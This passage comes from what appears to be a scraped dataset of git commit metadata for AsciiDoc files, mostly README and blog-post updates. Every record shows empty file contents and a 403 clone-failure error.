lasticsearch,elancom\/elasticsearch,sposam\/elasticsearch,fforbeck\/elasticsearch,wangtuo\/elasticsearch,pritishppai\/elasticsearch,anti-social\/elasticsearch,LewayneNaidoo\/elasticsearch,yongminxia\/elasticsearch,golubev\/elasticsearch,YosuaMichael\/elasticsearch,fekaputra\/elasticsearch,pozhidaevak\/elasticsearch,pritishppai\/elasticsearch,yuy168\/elasticsearch,hafkensite\/elasticsearch,jprante\/elasticsearch,avikurapati\/elasticsearch,hechunwen\/elasticsearch,franklanganke\/elasticsearch,sarwarbhuiyan\/elasticsearch,skearns64\/elasticsearch,nazarewk\/elasticsearch,fooljohnny\/elasticsearch,abibell\/elasticsearch,overcome\/elasticsearch,mmaracic\/elasticsearch,myelin\/elasticsearch,mortonsykes\/elasticsearch,slavau\/elasticsearch,vrkansagara\/elasticsearch,robin13\/elasticsearch,dylan8902\/elasticsearch,kunallimaye\/elasticsearch,mute\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,vrkansagara\/elasticsearch,lks21c\/elasticsearch,mmaracic\/elasticsearch,markharwood\/elasticsearch,MaineC\/elasticsearch,bestwpw\/elasticsearch,truemped\/elasticsearch,phani546\/elasticsearch,codebunt\/elasticsearch,tkssharma\/elasticsearch,mgalushka\/elasticsearch,yuy168\/elasticsearch,uschindler\/elasticsearch,Kakakakakku\/elasticsearch,karthikjaps\/elasticsearch,pranavraman\/elasticsearch,lydonchandra\/elasticsearch,brwe\/elasticsearch,scottsom\/elasticsearch,Fsero\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,F0lha\/elasticsearch,kalimatas\/elasticsearch,elancom\/elasticsearch,mohsinh\/elasticsearch,likaiwalkman\/elasticsearch,MaineC\/elasticsearch,tebriel\/elasticsearch,hanswang\/elasticsearch,Shekharrajak\/elasticsearch,achow\/elasticsearch,KimTaehee\/elasticsearch,chirilo\/elasticsearch,alexshadow007\/elasticsearch,TonyChai24\/ESSource,yanjunh\/elasticsearch,HonzaKral\/elasticsearch,ImpressTV\/elasticsearch,IanvsPoplicola\/elasticsearch,MaineC\/elasticsearch,vietlq\/elasticsearch,s1monw\/elasticse
arch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,linglaiyao1314\/elasticsearch,vorce\/es-metrics,loconsolutions\/elasticsearch,ydsakyclguozi\/elasticsearch,coding0011\/elasticsearch,wittyameta\/elasticsearch,knight1128\/elasticsearch,vvcephei\/elasticsearch,zhaocloud\/elasticsearch,kubum\/elasticsearch,wayeast\/elasticsearch,iantruslove\/elasticsearch,MisterAndersen\/elasticsearch,dpursehouse\/elasticsearch,zkidkid\/elasticsearch,nezirus\/elasticsearch,tebriel\/elasticsearch,overcome\/elasticsearch,dantuffery\/elasticsearch,nezirus\/elasticsearch,caengcjd\/elasticsearch,szroland\/elasticsearch,nellicus\/elasticsearch,Charlesdong\/elasticsearch,Uiho\/elasticsearch,luiseduardohdbackup\/elasticsearch,Ansh90\/elasticsearch,fubuki\/elasticsearch,wimvds\/elasticsearch,zhaocloud\/elasticsearch,luiseduardohdbackup\/elasticsearch,dylan8902\/elasticsearch,geidies\/elasticsearch,iamjakob\/elasticsearch,micpalmia\/elasticsearch,iamjakob\/elasticsearch,myelin\/elasticsearch,ivansun1010\/elasticsearch,Brijeshrpatel9\/elasticsearch,alexshadow007\/elasticsearch,lmtwga\/elasticsearch,lmtwga\/elasticsearch,iamjakob\/elasticsearch,gfyoung\/elasticsearch,mmaracic\/elasticsearch,jpountz\/elasticsearch,bestwpw\/elasticsearch,GlenRSmith\/elasticsearch,Brijeshrpatel9\/elasticsearch,shreejay\/elasticsearch,Rygbee\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,thecocce\/elasticsearch,episerver\/elasticsearch,sauravmondallive\/elasticsearch,masterweb121\/elasticsearch,humandb\/elasticsearch,luiseduardohdbackup\/elasticsearch,rmuir\/elasticsearch,strapdata\/elassandra,mrorii\/elasticsearch,lmtwga\/elasticsearch,nezirus\/elasticsearch,kaneshin\/elasticsearch,mapr\/elasticsearch,AndreKR\/elasticsearch,cwurm\/elasticsearch,JSCooke\/elasticsearch,jeteve\/elasticsearch,petabytedata\/elasticsearch,sjohnr\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,ckclark\/elasticsearch,MjAbuz\/elasticsearch,MetSystem\/elasticsearch,umeshdangat\/elasticsearch,sarwarbhuiyan\/elasticsearch,cnfire\/elasticsearch-1,infusionsoft\/elasticsearch,naveenhooda2000\/elasticsearch,sneivandt\/elasticsearch,jeteve\/elasticsearch,hydro2k\/elasticsearch,codebunt\/elasticsearch,likaiwalkman\/elasticsearch,nazarewk\/elasticsearch,dylan8902\/elasticsearch,mohit\/elasticsearch,yuy168\/elasticsearch,Charlesdong\/elasticsearch,rento19962\/elasticsearch,lzo\/elasticsearch-1,kcompher\/elasticsearch,sreeramjayan\/elasticsearch,geidies\/elasticsearch,jaynblue\/elasticsearch,Chhunlong\/elasticsearch,areek\/elasticsearch,maddin2016\/elasticsearch,wittyameta\/elasticsearch,aparo\/elasticsearch,mm0\/elasticsearch,areek\/elasticsearch,polyfractal\/elasticsearch,uschindler\/elasticsearch,kalburgimanjunath\/elasticsearch,vrkansagara\/elasticsearch,raishiv\/elasticsearch,smflorentino\/elasticsearch,JackyMai\/elasticsearch,pranavraman\/elasticsearch,sposam\/elasticsearch,tsohil\/elasticsearch,aparo\/elasticsearch,janmejay\/elasticsearch,JackyMai\/elasticsearch,Charlesdong\/elasticsearch,pranavraman\/elasticsearch,combinatorist\/elasticsearch,rmuir\/elasticsearch,mute\/elasticsearch,jeteve\/elasticsearch,mbrukman\/elasticsearch,naveenhooda2000\/elasticsearch,liweinan0423\/elasticsearch,caengcjd\/elasticsearch,socialrank\/elasticsearch,schonfeld\/elasticsearch,Widen\/elasticsearch,amit-shar\/elasticsearch,kaneshin\/elasticsearch,skearns64\/elasticsearch,mgalushka\/elasticsearch,Clairebi\/ElasticsearchClone,mbrukman\/elasticsearch,dylan8902\/elasticsearch,rhoml\/elasticsearch,ajhalani\/elasticsearch,truemped\/elas
ticsearch,thecocce\/elasticsearch,xingguang2013\/elasticsearch,sscarduzio\/elasticsearch,Shepard1212\/elasticsearch,kimimj\/elasticsearch,apepper\/elasticsearch,ydsakyclguozi\/elasticsearch,ckclark\/elasticsearch,JackyMai\/elasticsearch,kalimatas\/elasticsearch,Brijeshrpatel9\/elasticsearch,infusionsoft\/elasticsearch,lzo\/elasticsearch-1,djschny\/elasticsearch,yynil\/elasticsearch,JervyShi\/elasticsearch,kcompher\/elasticsearch,iamjakob\/elasticsearch,ImpressTV\/elasticsearch,hafkensite\/elasticsearch,diendt\/elasticsearch,jaynblue\/elasticsearch,NBSW\/elasticsearch,wuranbo\/elasticsearch,yanjunh\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mikemccand\/elasticsearch,sreeramjayan\/elasticsearch,javachengwc\/elasticsearch,tsohil\/elasticsearch,zeroctu\/elasticsearch,queirozfcom\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra5-rc,knight1128\/elasticsearch,KimTaehee\/elasticsearch,KimTaehee\/elasticsearch,mapr\/elasticsearch,awislowski\/elasticsearch,jchampion\/elasticsearch,MichaelLiZhou\/elasticsearch,fooljohnny\/elasticsearch,hanst\/elasticsearch,karthikjaps\/elasticsearch,easonC\/elasticsearch,ricardocerq\/elasticsearch,wuranbo\/elasticsearch,spiegela\/elasticsearch,vietlq\/elasticsearch,nilabhsagar\/elasticsearch,AleksKochev\/elasticsearch,hirdesh2008\/elasticsearch,strapdata\/elassandra5-rc,drewr\/elasticsearch,feiqitian\/elasticsearch,sarwarbhuiyan\/elasticsearch,zhiqinghuang\/elasticsearch,kimimj\/elasticsearch,micpalmia\/elasticsearch,pablocastro\/elasticsearch,zkidkid\/elasticsearch,xpandan\/elasticsearch,jeteve\/elasticsearch,vroyer\/elassandra,janmejay\/elasticsearch,Collaborne\/elasticsearch,hydro2k\/elasticsearch,nknize\/elasticsearch,amaliujia\/elasticsearch,salyh\/elasticsearch,strapdata\/elassandra-test,masterweb121\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,iamjakob\/elasticsearch,sarwarbhuiyan\/elasticsearch,wuranbo\/elasticsearch,vietlq\/elasticsearch,schonfeld\/elasticsearch,sposam\/elasticsearch,Kakakakakku\/elasticsearch,mjhennig\/elasticsearch,dataduke\/elasticsearch,fooljohnny\/elasticsearch,petabytedata\/elasticsearch,scottsom\/elasticsearch,jw0201\/elastic,springning\/elasticsearch,adrianbk\/elasticsearch,thecocce\/elasticsearch,infusionsoft\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,Shekharrajak\/elasticsearch,a2lin\/elasticsearch,djschny\/elasticsearch,jbertouch\/elasticsearch,mkis-\/elasticsearch,wbowling\/elasticsearch,onegambler\/elasticsearch,wimvds\/elasticsearch,dantuffery\/elasticsearch,kkirsche\/elasticsearch,petmit\/elasticsearch,Ansh90\/elasticsearch,Rygbee\/elasticsearch,nellicus\/elasticsearch,chirilo\/elasticsearch,libosu\/elasticsearch,lydonchandra\/elasticsearch,yanjunh\/elasticsearch,Flipkart\/elasticsearch,petmit\/elasticsearch,koxa29\/elasticsearch,javachengwc\/elasticsearch,MichaelLiZhou\/elasticsearch,kingaj\/elasticsearch,drewr\/elasticsearch,tebriel\/elasticsearch,markllama\/elasticsearch,xingguang2013\/elasticsearch,VukDukic\/elasticsearch,kaneshin\/elasticsearch,fernandozhu\/elasticsearch,KimTaehee\/elasticsearch,bestwpw\/elasticsearch,overcome\/elasticsearch,rhoml\/elasticsearch,YosuaMichael\/elasticsearch,glefloch\/elasticsearch,sc0ttkclark\/elasticsearch,areek\/elasticsearch,snikch\/elasticsearch,Widen\/elasticsearch,markwalkom\/elasticsearch,mohsinh\/elasticsearch,smflorentino\/elasticsearch,spiegela\/elasticsearch,wimvds\/elasticsearch,glefloch\/elasticsearch,umeshdangat\/elasticsearch,nilabhsagar\/elasticsearch,easonC\/elasticsearch,lightslife\/elasticsearch,vietlq\/elasticsearch,vroyer\/elastica
ssandra,pablocastro\/elasticsearch,tkssharma\/elasticsearch,onegambler\/elasticsearch,Clairebi\/ElasticsearchClone,LeoYao\/elasticsearch,jango2015\/elasticsearch,pablocastro\/elasticsearch,pranavraman\/elasticsearch,nknize\/elasticsearch,mohsinh\/elasticsearch,markharwood\/elasticsearch,vorce\/es-metrics,mortonsykes\/elasticsearch,MjAbuz\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,dataduke\/elasticsearch,phani546\/elasticsearch,hanst\/elasticsearch,queirozfcom\/elasticsearch,Liziyao\/elasticsearch,Widen\/elasticsearch,thecocce\/elasticsearch,springning\/elasticsearch,mmaracic\/elasticsearch,aparo\/elasticsearch,kevinkluge\/elasticsearch,mjhennig\/elasticsearch,girirajsharma\/elasticsearch,smflorentino\/elasticsearch,luiseduardohdbackup\/elasticsearch,rlugojr\/elasticsearch,sjohnr\/elasticsearch,huanzhong\/elasticsearch,HarishAtGitHub\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,socialrank\/elasticsearch,davidvgalbraith\/elasticsearch,mnylen\/elasticsearch,acchen97\/elasticsearch,bestwpw\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,trangvh\/elasticsearch,markllama\/elasticsearch,queirozfcom\/elasticsearch,heng4fun\/elasticsearch,franklanganke\/elasticsearch,myelin\/elasticsearch,sscarduzio\/elasticsearch,kenshin233\/elasticsearch,ricardocerq\/elasticsearch,MjAbuz\/elasticsearch,abhijitiitr\/es,TonyChai24\/ESSource,mcku\/elasticsearch,rmuir\/elasticsearch,kalimatas\/elasticsearch,chrismwendt\/elasticsearch,18098924759\/elasticsearch,zeroctu\/elasticsearch,aglne\/elasticsearch,dantuffery\/elasticsearch,episerver\/elasticsearch,mikemccand\/elasticsearch,fubuki\/elasticsearch,trangvh\/elasticsearch,obourgain\/elasticsearch,bawse\/elasticsearch,jw0201\/elastic,sc0ttkclark\/elasticsearch,drewr\/elasticsearch,Chhunlong\/elasticsearch,pritishppai\/elasticsearch,caengcjd\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra5-rc,gmarz\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,tcucchietti\/elasticsearch,masterweb121\/elasticsearch,TonyChai24\/ESSource,areek\/elasticsearch,scottsom\/elasticsearch,nellicus\/elasticsearch,djschny\/elasticsearch,AndreKR\/elasticsearch,fernandozhu\/elasticsearch,PhaedrusTheGreek\/elasticsearch,petabytedata\/elasticsearch,Flipkart\/elasticsearch,rajanm\/elasticsearch,combinatorist\/elasticsearch,karthikjaps\/elasticsearch,i-am-Nathan\/elasticsearch,djschny\/elasticsearch,lightslife\/elasticsearch,heng4fun\/elasticsearch,dongjoon-hyun\/elasticsearch,girirajsharma\/elasticsearch,JackyMai\/elasticsearch,wbowling\/elasticsearch,jchampion\/elasticsearch,vroyer\/elassandra,vingupta3\/elasticsearch,s1monw\/elasticsearch,ivansun1010\/elasticsearch,yongminxia\/elasticsearch,adrianbk\/elasticsearch,Shepard1212\/elasticsearch,shreejay\/elasticsearch,nilabhsagar\/elasticsearch,andrestc\/elasticsearch,sauravmondallive\/elasticsearch,snikch\/elasticsearch,a2lin\/elasticsearch,karthikjaps\/elasticsearch,SergVro\/elasticsearch,weipinghe\/elasticsearch,mortonsykes\/elasticsearch,peschlowp\/elasticsearch,snikch\/elasticsearch,LewayneNaidoo\/elasticsearch,yongminxia\/elasticsearch,andrejserafim\/elasticsearch,wittyameta\/elasticsearch,sscarduzio\/elasticsearch,vorce\/es-metrics,markllama\/elasticsearch,dongjoon-hyun\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,phani546\/elasticsearch,ouyangkongtong\/elasticsearch,tcucchietti\/elasticsearch,kalburgimanjunath\/elasticsearch,xpandan\/elasticsearch,Chhunlong\/elasticsearch,rajanm\/elasticsearch,StefanGor\/elasticsearch,likaiwalkman\/elasticsearch,zhaocloud\/elasticsea
rch,Fsero\/elasticsearch,Siddartha07\/elasticsearch,mnylen\/elasticsearch,Stacey-Gammon\/elasticsearch,palecur\/elasticsearch,shreejay\/elasticsearch,ESamir\/elasticsearch,zeroctu\/elasticsearch,milodky\/elasticsearch,ajhalani\/elasticsearch,sjohnr\/elasticsearch,cnfire\/elasticsearch-1,acchen97\/elasticsearch,yuy168\/elasticsearch,Ansh90\/elasticsearch,avikurapati\/elasticsearch,nrkkalyan\/elasticsearch,iantruslove\/elasticsearch,hirdesh2008\/elasticsearch,Brijeshrpatel9\/elasticsearch,wenpos\/elasticsearch,TonyChai24\/ESSource,Clairebi\/ElasticsearchClone,Asimov4\/elasticsearch,MichaelLiZhou\/elasticsearch,mute\/elasticsearch,wbowling\/elasticsearch,elasticdog\/elasticsearch,jango2015\/elasticsearch,dataduke\/elasticsearch,andrestc\/elasticsearch,javachengwc\/elasticsearch,ouyangkongtong\/elasticsearch,fforbeck\/elasticsearch,geidies\/elasticsearch,lchennup\/elasticsearch,HonzaKral\/elasticsearch,dpursehouse\/elasticsearch,fred84\/elasticsearch,tkssharma\/elasticsearch,chirilo\/elasticsearch,boliza\/elasticsearch,amaliujia\/elasticsearch,golubev\/elasticsearch,sdauletau\/elasticsearch,golubev\/elasticsearch,yanjunh\/elasticsearch,Charlesdong\/elasticsearch,kimimj\/elasticsearch,mikemccand\/elasticsearch,sdauletau\/elasticsearch,koxa29\/elasticsearch,mohit\/elasticsearch,smflorentino\/elasticsearch,Microsoft\/elasticsearch,acchen97\/elasticsearch,yongminxia\/elasticsearch,jeteve\/elasticsearch,YosuaMichael\/elasticsearch,mnylen\/elasticsearch,smflorentino\/elasticsearch,rlugojr\/elasticsearch,pozhidaevak\/elasticsearch,cnfire\/elasticsearch-1,strapdata\/elassandra,himanshuag\/elasticsearch,Brijeshrpatel9\/elasticsearch,petabytedata\/elasticsearch,LeoYao\/elasticsearch,EasonYi\/elasticsearch,yanjunh\/elasticsearch,sscarduzio\/elasticsearch,sc0ttkclark\/elasticsearch,khiraiwa\/elasticsearch,EasonYi\/elasticsearch,mkis-\/elasticsearch,sposam\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,mikemccand\/elasticsearch,pritishppai\/elasticsearch","old_file":"rest-api-spec\/test\/README.asciidoc","new_file":"rest-api-spec\/test\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d78b525cd5d3aa32b4c9fada5ea06e48cec610d7","subject":"Create README.adoc","message":"Create README.adoc\n","repos":"tgirard12\/kotlin-talk","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tgirard12\/kotlin-talk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a44cd7644f4cbdde98a34cc75a05521d6e7fb6b3","subject":"feat(doc): move to asciidoc","message":"feat(doc): move to asciidoc\n","repos":"gravitee-io\/gravitee-policy-request-content-limit","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-request-content-limit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ceb9a45d8bbd59bdd05cbae1695a4f6f661223ec","subject":"Updated README","message":"Updated 
README\n","repos":"adi9090\/javaanpr,adi9090\/javaanpr,justhackit\/javaanpr,joshuagn\/ANPR,justhackit\/javaanpr,joshuagn\/ANPR","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"24c5fad0374ee2f5233f0b431219e942dc3e5dfd","subject":"Better English convention","message":"Better English convention\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e4de0d2c87a3ff3c60c1d23263ad0310a3fd303e","subject":"Update README","message":"Update README\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-test,sdavids\/sdavids-commons-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8a53db22a226ccac73cc9db24332ff990cc5cf2","subject":"Create InstallingHadoop.asciidoc","message":"Create InstallingHadoop.asciidoc","repos":"agilemobiledev\/Intro-to-Spring-Hadoop,SpringOne2GX-2014\/Intro-to-Spring-Hadoop,SpringOne2GX-2014\/Intro-to-Spring-Hadoop,agilemobiledev\/Intro-to-Spring-Hadoop","old_file":"InstallingHadoop.asciidoc","new_file":"InstallingHadoop.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/agilemobiledev\/Intro-to-Spring-Hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fba5615618f44d956430612ac61c0aa0da1c4eeb","subject":"Update 2018-02-02-Patching-OP-Version.adoc","message":"Update 2018-02-02-Patching-OP-Version.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-02-02-Patching-OP-Version.adoc","new_file":"_posts\/2018-02-02-Patching-OP-Version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2945177bed84022b9e9cce7da6e7dce8215224a0","subject":"Some notes about Jaas like security.","message":"Some notes about Jaas like security.\n\nDidn't result in much outcome","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"doc\/notes\/jaas_like_security.adoc","new_file":"doc\/notes\/jaas_like_security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72e0e41d5532240bac583ad5e1ad8ece30aca06a","subject":"Update 2016-07-01-A-Flower.adoc","message":"Update 
2016-07-01-A-Flower.adoc","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-01-A-Flower.adoc","new_file":"_posts\/2016-07-01-A-Flower.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9859b8f8f3eca6a642180cba09eaf14637f3e87f","subject":"Update 2016-11-03-Kamakura.adoc","message":"Update 2016-11-03-Kamakura.adoc","repos":"endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/VinJBlog,endymion64\/endymion64.github.io","old_file":"_posts\/2016-11-03-Kamakura.adoc","new_file":"_posts\/2016-11-03-Kamakura.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b3549170d74489b06b0c27e06da547a06bb9a7f","subject":"Update 2017-05-02-FGOCCCBB.adoc","message":"Update 2017-05-02-FGOCCCBB.adoc","repos":"shunkou\/blog,shunkou\/blog,shunkou\/blog,shunkou\/blog","old_file":"_posts\/2017-05-02-FGOCCCBB.adoc","new_file":"_posts\/2017-05-02-FGOCCCBB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shunkou\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3dce21aa7fa9d4c4fd013e9322476a4810397f","subject":"Update 2020-02-12-strength.adoc","message":"Update 2020-02-12-strength.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-02-12-strength.adoc","new_file":"_posts\/2020-02-12-strength.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54d570591ef160a7eca7f1fe879d1aab443426f3","subject":"Update 2016-05-17-Kuznya-a-ved-udobno.adoc","message":"Update 2016-05-17-Kuznya-a-ved-udobno.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-17-Kuznya-a-ved-udobno.adoc","new_file":"_posts\/2016-05-17-Kuznya-a-ved-udobno.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09227eb5c2573d86b14c7bd935583d2a9502e5e2","subject":"Update 2015-02-10-R-K.adoc","message":"Update 2015-02-10-R-K.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-02-10-R-K.adoc","new_file":"_posts\/2015-02-10-R-K.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85300fc95402b9ec1577d962347e4bac2a4cf68d","subject":"Update 
2018-05-28-Gas.adoc","message":"Update 2018-05-28-Gas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Gas.adoc","new_file":"_posts\/2018-05-28-Gas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa90396e82efaadf1fcfcf63d3cd4a9679af98cd","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07f416293d6e0b8f4c5e75c9c8091553493efc86","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88e901fee7766a895ab77108b6f073fae6bf4a8c","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cdcc148dca840f34b479a1b0f77464cd440b123","subject":"Adding some notes on UI Security","message":"Adding some notes on UI Security\n","repos":"lefou\/blended,woq-blended\/blended,woq-blended\/blended,lefou\/blended","old_file":"doc\/UISecurity.adoc","new_file":"doc\/UISecurity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53a9d640ea5aea98704a8035647bebea34555f27","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d620a2ab9b8c8387052fd62701869e39d92ea32","subject":"Update 
2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e009035cb6d81880386ed595433760e3a2edd24","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e244a9e7d65a880b3d7ce9f925fa1eb88df7d688","subject":"Lib: Rope","message":"Lib: Rope\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 